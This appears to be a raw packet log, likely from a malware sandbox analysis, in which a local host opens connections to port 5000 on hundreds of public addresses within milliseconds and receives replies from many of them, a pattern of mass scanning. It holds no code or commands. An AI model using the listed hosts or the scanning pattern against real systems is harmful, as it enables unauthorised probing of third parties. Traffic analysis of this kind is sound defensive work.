                                                    Jul 10, 2024 08:26:11.795736074 CEST548125000192.168.2.14184.253.190.67
                                                    Jul 10, 2024 08:26:11.795736074 CEST571305000192.168.2.14184.91.18.187
                                                    Jul 10, 2024 08:26:11.795736074 CEST474945000192.168.2.14184.5.169.119
                                                    Jul 10, 2024 08:26:11.795736074 CEST445325000192.168.2.14184.38.49.148
                                                    Jul 10, 2024 08:26:11.795736074 CEST476705000192.168.2.14184.44.111.242
                                                    Jul 10, 2024 08:26:11.795736074 CEST361165000192.168.2.14184.73.101.19
                                                    Jul 10, 2024 08:26:11.795856953 CEST340505000192.168.2.14184.48.109.104
                                                    Jul 10, 2024 08:26:11.795856953 CEST493525000192.168.2.14184.6.49.132
                                                    Jul 10, 2024 08:26:11.795856953 CEST412505000192.168.2.14184.49.50.102
                                                    Jul 10, 2024 08:26:11.795856953 CEST538305000192.168.2.14184.244.228.81
                                                    Jul 10, 2024 08:26:11.795856953 CEST396725000192.168.2.14184.209.128.45
                                                    Jul 10, 2024 08:26:11.795856953 CEST353205000192.168.2.14184.53.243.23
                                                    Jul 10, 2024 08:26:11.795856953 CEST447445000192.168.2.14184.219.133.105
                                                    Jul 10, 2024 08:26:11.795856953 CEST474165000192.168.2.14184.158.81.150
                                                    Jul 10, 2024 08:26:11.796129942 CEST339165000192.168.2.14184.110.87.220
                                                    Jul 10, 2024 08:26:11.796129942 CEST438725000192.168.2.14184.17.63.233
                                                    Jul 10, 2024 08:26:11.796129942 CEST559625000192.168.2.14184.63.76.247
                                                    Jul 10, 2024 08:26:11.796129942 CEST376225000192.168.2.14184.250.77.103
                                                    Jul 10, 2024 08:26:11.796129942 CEST519685000192.168.2.14184.247.233.53
                                                    Jul 10, 2024 08:26:11.796129942 CEST332265000192.168.2.14184.6.13.240
                                                    Jul 10, 2024 08:26:11.796129942 CEST421485000192.168.2.14184.233.134.15
                                                    Jul 10, 2024 08:26:11.796129942 CEST383305000192.168.2.14184.209.89.52
                                                    Jul 10, 2024 08:26:11.797854900 CEST407205000192.168.2.14184.44.183.138
                                                    Jul 10, 2024 08:26:11.797854900 CEST548805000192.168.2.14184.72.193.234
                                                    Jul 10, 2024 08:26:11.797856092 CEST572065000192.168.2.14184.217.99.85
                                                    Jul 10, 2024 08:26:11.797856092 CEST434625000192.168.2.14184.0.252.205
                                                    Jul 10, 2024 08:26:11.797856092 CEST362945000192.168.2.14184.87.188.175
                                                    Jul 10, 2024 08:26:11.797856092 CEST484685000192.168.2.14184.162.78.242
                                                    Jul 10, 2024 08:26:11.797856092 CEST602785000192.168.2.14184.83.254.245
                                                    Jul 10, 2024 08:26:11.799076080 CEST380505000192.168.2.14184.39.93.20
                                                    Jul 10, 2024 08:26:11.799076080 CEST546165000192.168.2.14184.138.245.202
                                                    Jul 10, 2024 08:26:11.799076080 CEST424885000192.168.2.14184.137.78.222
                                                    Jul 10, 2024 08:26:11.799076080 CEST394205000192.168.2.14184.77.100.49
                                                    Jul 10, 2024 08:26:11.799076080 CEST406145000192.168.2.14184.124.197.200
                                                    Jul 10, 2024 08:26:11.799076080 CEST499705000192.168.2.14184.28.182.234
                                                    Jul 10, 2024 08:26:11.799076080 CEST455345000192.168.2.14184.11.205.24
                                                    Jul 10, 2024 08:26:11.799076080 CEST344625000192.168.2.14211.72.81.20
                                                    Jul 10, 2024 08:26:11.799160957 CEST500032826184.239.14.77192.168.2.14
                                                    Jul 10, 2024 08:26:11.799570084 CEST505705000192.168.2.14211.2.106.72
                                                    Jul 10, 2024 08:26:11.799570084 CEST600705000192.168.2.14211.200.32.181
                                                    Jul 10, 2024 08:26:11.799570084 CEST597325000192.168.2.14211.69.46.45
                                                    Jul 10, 2024 08:26:11.799570084 CEST410245000192.168.2.14211.7.7.172
                                                    Jul 10, 2024 08:26:11.799570084 CEST343885000192.168.2.14211.158.67.141
                                                    Jul 10, 2024 08:26:11.799570084 CEST463285000192.168.2.14211.151.115.97
                                                    Jul 10, 2024 08:26:11.799570084 CEST468205000192.168.2.14211.63.12.86
                                                    Jul 10, 2024 08:26:11.799570084 CEST481725000192.168.2.14211.2.213.10
                                                    Jul 10, 2024 08:26:11.799607992 CEST500034472184.23.251.218192.168.2.14
                                                    Jul 10, 2024 08:26:11.799623013 CEST500057194184.225.166.232192.168.2.14
                                                    Jul 10, 2024 08:26:11.799633026 CEST500047928184.35.31.78192.168.2.14
                                                    Jul 10, 2024 08:26:11.799642086 CEST500046776184.115.114.30192.168.2.14
                                                    Jul 10, 2024 08:26:11.799922943 CEST442305000192.168.2.14184.169.222.216
                                                    Jul 10, 2024 08:26:11.799922943 CEST384945000192.168.2.14184.9.84.225
                                                    Jul 10, 2024 08:26:11.799922943 CEST352485000192.168.2.14184.250.66.51
                                                    Jul 10, 2024 08:26:11.799922943 CEST510525000192.168.2.14184.97.48.69
                                                    Jul 10, 2024 08:26:11.799922943 CEST434925000192.168.2.14184.219.127.183
                                                    Jul 10, 2024 08:26:11.799922943 CEST510585000192.168.2.14211.5.18.15
                                                    Jul 10, 2024 08:26:11.799922943 CEST334245000192.168.2.14211.58.133.2
                                                    Jul 10, 2024 08:26:11.799922943 CEST370925000192.168.2.14211.239.232.109
                                                    Jul 10, 2024 08:26:11.800585985 CEST500048338184.69.248.106192.168.2.14
                                                    Jul 10, 2024 08:26:11.800595999 CEST500059544184.58.118.88192.168.2.14
                                                    Jul 10, 2024 08:26:11.800605059 CEST500051344184.157.88.71192.168.2.14
                                                    Jul 10, 2024 08:26:11.801134109 CEST500048042184.159.26.123192.168.2.14
                                                    Jul 10, 2024 08:26:11.801340103 CEST500047102184.207.213.163192.168.2.14
                                                    Jul 10, 2024 08:26:11.801350117 CEST500048126184.163.171.101192.168.2.14
                                                    Jul 10, 2024 08:26:11.801358938 CEST500041916184.36.124.90192.168.2.14
                                                    Jul 10, 2024 08:26:11.801400900 CEST500038598184.231.50.255192.168.2.14
                                                    Jul 10, 2024 08:26:11.801409960 CEST500047334184.170.42.167192.168.2.14
                                                    Jul 10, 2024 08:26:11.801419020 CEST500060698184.213.180.26192.168.2.14
                                                    Jul 10, 2024 08:26:11.801963091 CEST500034050184.48.109.104192.168.2.14
                                                    Jul 10, 2024 08:26:11.801975965 CEST493245000192.168.2.14184.237.147.26
                                                    Jul 10, 2024 08:26:11.801975965 CEST411885000192.168.2.14211.189.104.224
                                                    Jul 10, 2024 08:26:11.801975965 CEST504465000192.168.2.14211.242.20.220
                                                    Jul 10, 2024 08:26:11.801976919 CEST517445000192.168.2.14211.30.33.166
                                                    Jul 10, 2024 08:26:11.801976919 CEST571345000192.168.2.14211.127.237.133
                                                    Jul 10, 2024 08:26:11.801976919 CEST396145000192.168.2.14211.181.216.185
                                                    Jul 10, 2024 08:26:11.801976919 CEST443665000192.168.2.14211.133.219.103
                                                    Jul 10, 2024 08:26:11.801976919 CEST449245000192.168.2.14211.136.205.137
                                                    Jul 10, 2024 08:26:11.801980019 CEST500056152184.188.249.125192.168.2.14
                                                    Jul 10, 2024 08:26:11.801990986 CEST500033916184.110.87.220192.168.2.14
                                                    Jul 10, 2024 08:26:11.802298069 CEST500035184184.113.206.110192.168.2.14
                                                    Jul 10, 2024 08:26:11.802582026 CEST500043872184.17.63.233192.168.2.14
                                                    Jul 10, 2024 08:26:11.802592039 CEST500057776184.27.11.237192.168.2.14
                                                    Jul 10, 2024 08:26:11.802638054 CEST500055202184.44.135.20192.168.2.14
                                                    Jul 10, 2024 08:26:11.802802086 CEST523385000192.168.2.14211.229.165.137
                                                    Jul 10, 2024 08:26:11.802802086 CEST434365000192.168.2.14211.59.203.172
                                                    Jul 10, 2024 08:26:11.802802086 CEST536885000192.168.2.14211.81.214.211
                                                    Jul 10, 2024 08:26:11.802802086 CEST571845000192.168.2.14211.229.37.154
                                                    Jul 10, 2024 08:26:11.802802086 CEST417245000192.168.2.14211.37.188.170
                                                    Jul 10, 2024 08:26:11.802802086 CEST575165000192.168.2.14211.234.224.27
                                                    Jul 10, 2024 08:26:11.802802086 CEST534565000192.168.2.14211.56.67.12
                                                    Jul 10, 2024 08:26:11.802802086 CEST511105000192.168.2.14211.218.23.159
                                                    Jul 10, 2024 08:26:11.802999973 CEST394265000192.168.2.14211.63.75.217
                                                    Jul 10, 2024 08:26:11.803000927 CEST455205000192.168.2.14211.62.105.71
                                                    Jul 10, 2024 08:26:11.803000927 CEST583945000192.168.2.14211.89.57.243
                                                    Jul 10, 2024 08:26:11.803000927 CEST556285000192.168.2.14211.32.196.18
                                                    Jul 10, 2024 08:26:11.803000927 CEST609045000192.168.2.14211.203.200.213
                                                    Jul 10, 2024 08:26:11.803000927 CEST565245000192.168.2.14211.116.200.199
                                                    Jul 10, 2024 08:26:11.803000927 CEST451445000192.168.2.14211.107.33.149
                                                    Jul 10, 2024 08:26:11.803000927 CEST388105000192.168.2.14211.134.68.37
                                                    Jul 10, 2024 08:26:11.803517103 CEST500057312184.60.60.176192.168.2.14
                                                    Jul 10, 2024 08:26:11.803581953 CEST500033040184.41.235.112192.168.2.14
                                                    Jul 10, 2024 08:26:11.803613901 CEST500055962184.63.76.247192.168.2.14
                                                    Jul 10, 2024 08:26:11.803730965 CEST500040720184.44.183.138192.168.2.14
                                                    Jul 10, 2024 08:26:11.803761959 CEST500049352184.6.49.132192.168.2.14
                                                    Jul 10, 2024 08:26:11.803792000 CEST500054880184.72.193.234192.168.2.14
                                                    Jul 10, 2024 08:26:11.803848028 CEST500037622184.250.77.103192.168.2.14
                                                    Jul 10, 2024 08:26:11.803875923 CEST500041250184.49.50.102192.168.2.14
                                                    Jul 10, 2024 08:26:11.803905010 CEST500057206184.217.99.85192.168.2.14
                                                    Jul 10, 2024 08:26:11.804167032 CEST590965000192.168.2.14211.221.137.197
                                                    Jul 10, 2024 08:26:11.804167032 CEST448945000192.168.2.14211.6.6.56
                                                    Jul 10, 2024 08:26:11.804167032 CEST411045000192.168.2.14211.222.124.217
                                                    Jul 10, 2024 08:26:11.804167032 CEST574965000192.168.2.14211.240.86.217
                                                    Jul 10, 2024 08:26:11.804167032 CEST413485000192.168.2.14211.101.142.88
                                                    Jul 10, 2024 08:26:11.804167032 CEST384245000192.168.2.14211.176.63.233
                                                    Jul 10, 2024 08:26:11.804167032 CEST379725000192.168.2.14211.188.221.203
                                                    Jul 10, 2024 08:26:11.804167032 CEST429225000192.168.2.14211.244.158.209
                                                    Jul 10, 2024 08:26:11.804435015 CEST500042964184.163.112.62192.168.2.14
                                                    Jul 10, 2024 08:26:11.804467916 CEST500043462184.0.252.205192.168.2.14
                                                    Jul 10, 2024 08:26:11.804522991 CEST500057826184.83.14.18192.168.2.14
                                                    Jul 10, 2024 08:26:11.804562092 CEST500056516184.98.146.18192.168.2.14
                                                    Jul 10, 2024 08:26:11.804589987 CEST500046464184.230.32.114192.168.2.14
                                                    Jul 10, 2024 08:26:11.804619074 CEST500054644184.61.245.237192.168.2.14
                                                    Jul 10, 2024 08:26:11.804732084 CEST360265000192.168.2.14184.76.141.89
                                                    Jul 10, 2024 08:26:11.804732084 CEST359825000192.168.2.14184.123.51.19
                                                    Jul 10, 2024 08:26:11.804732084 CEST394985000192.168.2.14184.28.229.147
                                                    Jul 10, 2024 08:26:11.804732084 CEST374465000192.168.2.14184.160.169.144
                                                    Jul 10, 2024 08:26:11.804732084 CEST414505000192.168.2.14184.147.188.6
                                                    Jul 10, 2024 08:26:11.804732084 CEST414685000192.168.2.14211.35.251.215
                                                    Jul 10, 2024 08:26:11.804732084 CEST373345000192.168.2.14211.202.85.48
                                                    Jul 10, 2024 08:26:11.804732084 CEST442625000192.168.2.14211.220.110.70
                                                    Jul 10, 2024 08:26:11.804809093 CEST500054812184.253.190.67192.168.2.14
                                                    Jul 10, 2024 08:26:11.804843903 CEST353025000192.168.2.14211.128.126.95
                                                    Jul 10, 2024 08:26:11.804845095 CEST542545000192.168.2.14211.48.53.157
                                                    Jul 10, 2024 08:26:11.804845095 CEST520445000192.168.2.14211.194.237.167
                                                    Jul 10, 2024 08:26:11.804845095 CEST480905000192.168.2.14211.174.61.167
                                                    Jul 10, 2024 08:26:11.804845095 CEST549145000192.168.2.14211.158.208.229
                                                    Jul 10, 2024 08:26:11.804845095 CEST389625000192.168.2.14211.225.79.20
                                                    Jul 10, 2024 08:26:11.804845095 CEST578365000192.168.2.14211.14.164.58
                                                    Jul 10, 2024 08:26:11.804845095 CEST341045000192.168.2.14211.38.179.111
                                                    Jul 10, 2024 08:26:11.805067062 CEST538125000192.168.2.14184.39.180.234
                                                    Jul 10, 2024 08:26:11.805067062 CEST573565000192.168.2.14184.250.187.6
                                                    Jul 10, 2024 08:26:11.805068016 CEST609125000192.168.2.14211.236.199.106
                                                    Jul 10, 2024 08:26:11.805068016 CEST452665000192.168.2.14211.119.243.130
                                                    Jul 10, 2024 08:26:11.805068016 CEST496625000192.168.2.14211.216.221.135
                                                    Jul 10, 2024 08:26:11.805068016 CEST355705000192.168.2.14211.161.181.212
                                                    Jul 10, 2024 08:26:11.805068016 CEST592745000192.168.2.14211.106.99.113
                                                    Jul 10, 2024 08:26:11.805068016 CEST470465000192.168.2.14211.25.31.142
                                                    Jul 10, 2024 08:26:11.805093050 CEST500050570211.2.106.72192.168.2.14
                                                    Jul 10, 2024 08:26:11.805114985 CEST500045968184.146.101.192192.168.2.14
                                                    Jul 10, 2024 08:26:11.805125952 CEST500038050184.39.93.20192.168.2.14
                                                    Jul 10, 2024 08:26:11.805196047 CEST500057130184.91.18.187192.168.2.14
                                                    Jul 10, 2024 08:26:11.805207968 CEST500054616184.138.245.202192.168.2.14
                                                    Jul 10, 2024 08:26:11.805217981 CEST500044230184.169.222.216192.168.2.14
                                                    Jul 10, 2024 08:26:11.805270910 CEST500060070211.200.32.181192.168.2.14
                                                    Jul 10, 2024 08:26:11.805357933 CEST500038494184.9.84.225192.168.2.14
                                                    Jul 10, 2024 08:26:11.805919886 CEST500059732211.69.46.45192.168.2.14
                                                    Jul 10, 2024 08:26:11.805967093 CEST500042488184.137.78.222192.168.2.14
                                                    Jul 10, 2024 08:26:11.805996895 CEST500047494184.5.169.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.806025982 CEST500039420184.77.100.49192.168.2.14
                                                    Jul 10, 2024 08:26:11.806071043 CEST500041024211.7.7.172192.168.2.14
                                                    Jul 10, 2024 08:26:11.806098938 CEST500044532184.38.49.148192.168.2.14
                                                    Jul 10, 2024 08:26:11.806128979 CEST500040614184.124.197.200192.168.2.14
                                                    Jul 10, 2024 08:26:11.806536913 CEST500053830184.244.228.81192.168.2.14
                                                    Jul 10, 2024 08:26:11.806569099 CEST500047670184.44.111.242192.168.2.14
                                                    Jul 10, 2024 08:26:11.806677103 CEST500035248184.250.66.51192.168.2.14
                                                    Jul 10, 2024 08:26:11.806705952 CEST500034388211.158.67.141192.168.2.14
                                                    Jul 10, 2024 08:26:11.806735039 CEST500051052184.97.48.69192.168.2.14
                                                    Jul 10, 2024 08:26:11.806762934 CEST500046328211.151.115.97192.168.2.14
                                                    Jul 10, 2024 08:26:11.807153940 CEST500043492184.219.127.183192.168.2.14
                                                    Jul 10, 2024 08:26:11.807164907 CEST500036294184.87.188.175192.168.2.14
                                                    Jul 10, 2024 08:26:11.807173967 CEST500036116184.73.101.19192.168.2.14
                                                    Jul 10, 2024 08:26:11.807320118 CEST500046820211.63.12.86192.168.2.14
                                                    Jul 10, 2024 08:26:11.807398081 CEST500039672184.209.128.45192.168.2.14
                                                    Jul 10, 2024 08:26:11.807406902 CEST500049970184.28.182.234192.168.2.14
                                                    Jul 10, 2024 08:26:11.807472944 CEST500035320184.53.243.23192.168.2.14
                                                    Jul 10, 2024 08:26:11.807483912 CEST500048468184.162.78.242192.168.2.14
                                                    Jul 10, 2024 08:26:11.807650089 CEST500039458184.54.207.119192.168.2.14
                                                    Jul 10, 2024 08:26:11.807661057 CEST500060278184.83.254.245192.168.2.14
                                                    Jul 10, 2024 08:26:11.807670116 CEST500045534184.11.205.24192.168.2.14
                                                    Jul 10, 2024 08:26:11.807990074 CEST380065000192.168.2.14211.134.171.239
                                                    Jul 10, 2024 08:26:11.807990074 CEST459865000192.168.2.14211.91.5.102
                                                    Jul 10, 2024 08:26:11.808051109 CEST545645000192.168.2.14211.24.77.188
                                                    Jul 10, 2024 08:26:11.808051109 CEST365685000192.168.2.14211.246.39.155
                                                    Jul 10, 2024 08:26:11.808051109 CEST531225000192.168.2.14211.145.32.60
                                                    Jul 10, 2024 08:26:11.808051109 CEST347645000192.168.2.14211.23.9.57
                                                    Jul 10, 2024 08:26:11.808051109 CEST602765000192.168.2.14211.43.12.177
                                                    Jul 10, 2024 08:26:11.808051109 CEST362645000192.168.2.14211.96.207.168
                                                    Jul 10, 2024 08:26:11.808051109 CEST520765000192.168.2.14211.63.136.48
                                                    Jul 10, 2024 08:26:11.808314085 CEST500048172211.2.213.10192.168.2.14
                                                    Jul 10, 2024 08:26:11.808326960 CEST500051968184.247.233.53192.168.2.14
                                                    Jul 10, 2024 08:26:11.808336973 CEST500051058211.5.18.15192.168.2.14
                                                    Jul 10, 2024 08:26:11.808383942 CEST500039426211.63.75.217192.168.2.14
                                                    Jul 10, 2024 08:26:11.808393955 CEST500033424211.58.133.2192.168.2.14
                                                    Jul 10, 2024 08:26:11.808403015 CEST500045520211.62.105.71192.168.2.14
                                                    Jul 10, 2024 08:26:11.808835030 CEST500039558184.239.93.42192.168.2.14
                                                    Jul 10, 2024 08:26:11.809439898 CEST500033226184.6.13.240192.168.2.14
                                                    Jul 10, 2024 08:26:11.809513092 CEST500034462211.72.81.20192.168.2.14
                                                    Jul 10, 2024 08:26:11.809521914 CEST500044744184.219.133.105192.168.2.14
                                                    Jul 10, 2024 08:26:11.809531927 CEST500042148184.233.134.15192.168.2.14
                                                    Jul 10, 2024 08:26:11.809540987 CEST500052338211.229.165.137192.168.2.14
                                                    Jul 10, 2024 08:26:11.809550047 CEST500047416184.158.81.150192.168.2.14
                                                    Jul 10, 2024 08:26:11.809747934 CEST378265000192.168.2.14211.153.150.94
                                                    Jul 10, 2024 08:26:11.809748888 CEST522305000192.168.2.14211.15.34.140
                                                    Jul 10, 2024 08:26:11.809748888 CEST528685000192.168.2.14211.32.114.170
                                                    Jul 10, 2024 08:26:11.809748888 CEST400625000192.168.2.14211.230.81.151
                                                    Jul 10, 2024 08:26:11.809748888 CEST355585000192.168.2.14211.202.216.143
                                                    Jul 10, 2024 08:26:11.809748888 CEST452265000192.168.2.14211.187.47.169
                                                    Jul 10, 2024 08:26:11.809748888 CEST435705000192.168.2.14211.43.129.133
                                                    Jul 10, 2024 08:26:11.809748888 CEST522965000192.168.2.14211.76.152.29
                                                    Jul 10, 2024 08:26:11.809798956 CEST513345000192.168.2.14211.206.8.183
                                                    Jul 10, 2024 08:26:11.809798956 CEST362085000192.168.2.14211.16.163.159
                                                    Jul 10, 2024 08:26:11.809798956 CEST400185000192.168.2.14211.183.218.59
                                                    Jul 10, 2024 08:26:11.809798956 CEST446125000192.168.2.14211.167.214.151
                                                    Jul 10, 2024 08:26:11.809798956 CEST383165000192.168.2.14211.11.61.5
                                                    Jul 10, 2024 08:26:11.809798956 CEST386965000192.168.2.14211.109.197.126
                                                    Jul 10, 2024 08:26:11.809798956 CEST591245000192.168.2.14211.21.44.245
                                                    Jul 10, 2024 08:26:11.809798956 CEST455985000192.168.2.14211.200.34.171
                                                    Jul 10, 2024 08:26:11.809963942 CEST500037092211.239.232.109192.168.2.14
                                                    Jul 10, 2024 08:26:11.810036898 CEST487005000192.168.2.14211.41.148.119
                                                    Jul 10, 2024 08:26:11.810036898 CEST356605000192.168.2.14211.87.194.245
                                                    Jul 10, 2024 08:26:11.810036898 CEST355045000192.168.2.14211.39.49.194
                                                    Jul 10, 2024 08:26:11.810036898 CEST427585000192.168.2.14211.205.65.39
                                                    Jul 10, 2024 08:26:11.810036898 CEST335785000192.168.2.14211.26.137.212
                                                    Jul 10, 2024 08:26:11.810036898 CEST462105000192.168.2.14211.5.175.212
                                                    Jul 10, 2024 08:26:11.810036898 CEST608965000192.168.2.14211.63.220.104
                                                    Jul 10, 2024 08:26:11.810036898 CEST425625000192.168.2.14211.77.167.114
                                                    Jul 10, 2024 08:26:11.810154915 CEST500038330184.209.89.52192.168.2.14
                                                    Jul 10, 2024 08:26:11.810168028 CEST500049324184.237.147.26192.168.2.14
                                                    Jul 10, 2024 08:26:11.810177088 CEST500036026184.76.141.89192.168.2.14
                                                    Jul 10, 2024 08:26:11.810873985 CEST500059096211.221.137.197192.168.2.14
                                                    Jul 10, 2024 08:26:11.811183929 CEST500035302211.128.126.95192.168.2.14
                                                    Jul 10, 2024 08:26:11.811217070 CEST500053812184.39.180.234192.168.2.14
                                                    Jul 10, 2024 08:26:11.811245918 CEST500041188211.189.104.224192.168.2.14
                                                    Jul 10, 2024 08:26:11.811275005 CEST500035982184.123.51.19192.168.2.14
                                                    Jul 10, 2024 08:26:11.811316013 CEST500044894211.6.6.56192.168.2.14
                                                    Jul 10, 2024 08:26:11.811346054 CEST500043436211.59.203.172192.168.2.14
                                                    Jul 10, 2024 08:26:11.811374903 CEST500051744211.30.33.166192.168.2.14
                                                    Jul 10, 2024 08:26:11.811403036 CEST500054254211.48.53.157192.168.2.14
                                                    Jul 10, 2024 08:26:11.811430931 CEST500058394211.89.57.243192.168.2.14
                                                    Jul 10, 2024 08:26:11.811436892 CEST566645000192.168.2.14211.24.40.236
                                                    Jul 10, 2024 08:26:11.811436892 CEST527025000192.168.2.14211.233.253.136
                                                    Jul 10, 2024 08:26:11.811436892 CEST572025000192.168.2.14211.241.193.147
                                                    Jul 10, 2024 08:26:11.811436892 CEST537305000192.168.2.14211.33.115.237
                                                    Jul 10, 2024 08:26:11.811436892 CEST589005000192.168.2.14211.173.173.6
                                                    Jul 10, 2024 08:26:11.811438084 CEST437145000192.168.2.14211.252.231.154
                                                    Jul 10, 2024 08:26:11.811438084 CEST440285000192.168.2.14211.12.207.108
                                                    Jul 10, 2024 08:26:11.811438084 CEST403825000192.168.2.14211.202.247.124
                                                    Jul 10, 2024 08:26:11.811459064 CEST500050446211.242.20.220192.168.2.14
                                                    Jul 10, 2024 08:26:11.811496973 CEST500052044211.194.237.167192.168.2.14
                                                    Jul 10, 2024 08:26:11.811525106 CEST500055628211.32.196.18192.168.2.14
                                                    Jul 10, 2024 08:26:11.811552048 CEST500057134211.127.237.133192.168.2.14
                                                    Jul 10, 2024 08:26:11.811600924 CEST500053688211.81.214.211192.168.2.14
                                                    Jul 10, 2024 08:26:11.811701059 CEST424965000192.168.2.14211.93.214.223
                                                    Jul 10, 2024 08:26:11.811701059 CEST379505000192.168.2.14211.172.240.96
                                                    Jul 10, 2024 08:26:11.811701059 CEST408145000192.168.2.14211.70.10.73
                                                    Jul 10, 2024 08:26:11.811701059 CEST443005000192.168.2.14211.8.93.235
                                                    Jul 10, 2024 08:26:11.811701059 CEST563405000192.168.2.14211.149.215.249
                                                    Jul 10, 2024 08:26:11.811701059 CEST553345000192.168.2.14211.245.64.163
                                                    Jul 10, 2024 08:26:11.811701059 CEST607385000192.168.2.14211.225.204.193
                                                    Jul 10, 2024 08:26:11.811701059 CEST415465000192.168.2.14211.99.124.148
                                                    Jul 10, 2024 08:26:11.811767101 CEST342925000192.168.2.14211.199.42.218
                                                    Jul 10, 2024 08:26:11.811767101 CEST461565000192.168.2.14211.67.249.254
                                                    Jul 10, 2024 08:26:11.811767101 CEST357145000192.168.2.14211.112.110.151
                                                    Jul 10, 2024 08:26:11.811767101 CEST508385000192.168.2.14211.220.243.213
                                                    Jul 10, 2024 08:26:11.811767101 CEST563705000192.168.2.14211.232.114.43
                                                    Jul 10, 2024 08:26:11.811767101 CEST578785000192.168.2.14211.134.138.101
                                                    Jul 10, 2024 08:26:11.811767101 CEST595405000192.168.2.14211.149.216.242
                                                    Jul 10, 2024 08:26:11.811767101 CEST368785000192.168.2.14211.208.35.179
                                                    Jul 10, 2024 08:26:11.811817884 CEST500041104211.222.124.217192.168.2.14
                                                    Jul 10, 2024 08:26:11.811846972 CEST500039498184.28.229.147192.168.2.14
                                                    Jul 10, 2024 08:26:11.812063932 CEST482565000192.168.2.14211.255.136.98
                                                    Jul 10, 2024 08:26:11.812064886 CEST609805000192.168.2.14211.186.169.43
                                                    Jul 10, 2024 08:26:11.812064886 CEST474365000192.168.2.14211.200.32.188
                                                    Jul 10, 2024 08:26:11.812066078 CEST500048090211.174.61.167192.168.2.14
                                                    Jul 10, 2024 08:26:11.812064886 CEST405805000192.168.2.14211.73.23.60
                                                    Jul 10, 2024 08:26:11.812064886 CEST348025000192.168.2.14211.255.136.8
                                                    Jul 10, 2024 08:26:11.812064886 CEST451225000192.168.2.14211.248.86.121
                                                    Jul 10, 2024 08:26:11.812064886 CEST583685000192.168.2.14211.201.147.57
                                                    Jul 10, 2024 08:26:11.812064886 CEST401725000192.168.2.14211.109.239.189
                                                    Jul 10, 2024 08:26:11.812096119 CEST500060904211.203.200.213192.168.2.14
                                                    Jul 10, 2024 08:26:11.812140942 CEST500054914211.158.208.229192.168.2.14
                                                    Jul 10, 2024 08:26:11.812170029 CEST500056524211.116.200.199192.168.2.14
                                                    Jul 10, 2024 08:26:11.812201977 CEST500038962211.225.79.20192.168.2.14
                                                    Jul 10, 2024 08:26:11.812242985 CEST500057356184.250.187.6192.168.2.14
                                                    Jul 10, 2024 08:26:11.812271118 CEST500037446184.160.169.144192.168.2.14
                                                    Jul 10, 2024 08:26:11.812458992 CEST500057184211.229.37.154192.168.2.14
                                                    Jul 10, 2024 08:26:11.812551975 CEST500041450184.147.188.6192.168.2.14
                                                    Jul 10, 2024 08:26:11.813292027 CEST500045144211.107.33.149192.168.2.14
                                                    Jul 10, 2024 08:26:11.813307047 CEST500057836211.14.164.58192.168.2.14
                                                    Jul 10, 2024 08:26:11.813316107 CEST500038810211.134.68.37192.168.2.14
                                                    Jul 10, 2024 08:26:11.813324928 CEST500034104211.38.179.111192.168.2.14
                                                    Jul 10, 2024 08:26:11.813333988 CEST500038006211.134.171.239192.168.2.14
                                                    Jul 10, 2024 08:26:11.813343048 CEST500054564211.24.77.188192.168.2.14
                                                    Jul 10, 2024 08:26:11.813352108 CEST500041724211.37.188.170192.168.2.14
                                                    Jul 10, 2024 08:26:11.813513041 CEST366625000192.168.2.14211.158.225.205
                                                    Jul 10, 2024 08:26:11.813513041 CEST392985000192.168.2.14211.177.149.196
                                                    Jul 10, 2024 08:26:11.813513041 CEST459505000192.168.2.14211.219.25.93
                                                    Jul 10, 2024 08:26:11.813513994 CEST541085000192.168.2.14211.230.200.66
                                                    Jul 10, 2024 08:26:11.813513994 CEST398525000192.168.2.14211.247.38.111
                                                    Jul 10, 2024 08:26:11.813513994 CEST540025000192.168.2.14211.87.199.126
                                                    Jul 10, 2024 08:26:11.813513994 CEST504465000192.168.2.14211.242.20.220
                                                    Jul 10, 2024 08:26:11.813661098 CEST500041468211.35.251.215192.168.2.14
                                                    Jul 10, 2024 08:26:11.813680887 CEST500057496211.240.86.217192.168.2.14
                                                    Jul 10, 2024 08:26:11.813692093 CEST500045986211.91.5.102192.168.2.14
                                                    Jul 10, 2024 08:26:11.813700914 CEST500060912211.236.199.106192.168.2.14
                                                    Jul 10, 2024 08:26:11.814035892 CEST345185000192.168.2.14211.6.93.177
                                                    Jul 10, 2024 08:26:11.814035892 CEST429805000192.168.2.14211.113.128.138
                                                    Jul 10, 2024 08:26:11.814035892 CEST605925000192.168.2.14211.76.74.243
                                                    Jul 10, 2024 08:26:11.814035892 CEST481805000192.168.2.14211.76.220.216
                                                    Jul 10, 2024 08:26:11.814035892 CEST372325000192.168.2.14211.223.182.146
                                                    Jul 10, 2024 08:26:11.814035892 CEST419525000192.168.2.14211.90.109.104
                                                    Jul 10, 2024 08:26:11.814035892 CEST473625000192.168.2.14211.244.223.137
                                                    Jul 10, 2024 08:26:11.814035892 CEST395345000192.168.2.14211.29.186.247
                                                    Jul 10, 2024 08:26:11.814090014 CEST558545000192.168.2.14211.90.129.39
                                                    Jul 10, 2024 08:26:11.814090014 CEST595045000192.168.2.14211.46.107.127
                                                    Jul 10, 2024 08:26:11.814090014 CEST446585000192.168.2.14211.167.96.239
                                                    Jul 10, 2024 08:26:11.814090014 CEST396245000192.168.2.14211.60.246.244
                                                    Jul 10, 2024 08:26:11.814090014 CEST607685000192.168.2.14211.219.2.156
                                                    Jul 10, 2024 08:26:11.814090014 CEST359465000192.168.2.14211.48.136.37
                                                    Jul 10, 2024 08:26:11.814090014 CEST490025000192.168.2.14211.196.165.24
                                                    Jul 10, 2024 08:26:11.814090014 CEST391085000192.168.2.14211.170.38.105
                                                    Jul 10, 2024 08:26:11.814147949 CEST500057516211.234.224.27192.168.2.14
                                                    Jul 10, 2024 08:26:11.814239979 CEST500039614211.181.216.185192.168.2.14
                                                    Jul 10, 2024 08:26:11.814249992 CEST500037334211.202.85.48192.168.2.14
                                                    Jul 10, 2024 08:26:11.814260006 CEST500036568211.246.39.155192.168.2.14
                                                    Jul 10, 2024 08:26:11.814270973 CEST500045266211.119.243.130192.168.2.14
                                                    Jul 10, 2024 08:26:11.814280987 CEST500044366211.133.219.103192.168.2.14
                                                    Jul 10, 2024 08:26:11.814337015 CEST500041348211.101.142.88192.168.2.14
                                                    Jul 10, 2024 08:26:11.814539909 CEST500049662211.216.221.135192.168.2.14
                                                    Jul 10, 2024 08:26:11.814548969 CEST500043172184.97.194.26192.168.2.14
                                                    Jul 10, 2024 08:26:11.814558983 CEST500038424211.176.63.233192.168.2.14
                                                    Jul 10, 2024 08:26:11.814568043 CEST500044262211.220.110.70192.168.2.14
                                                    Jul 10, 2024 08:26:11.814807892 CEST587405000192.168.2.14211.204.165.190
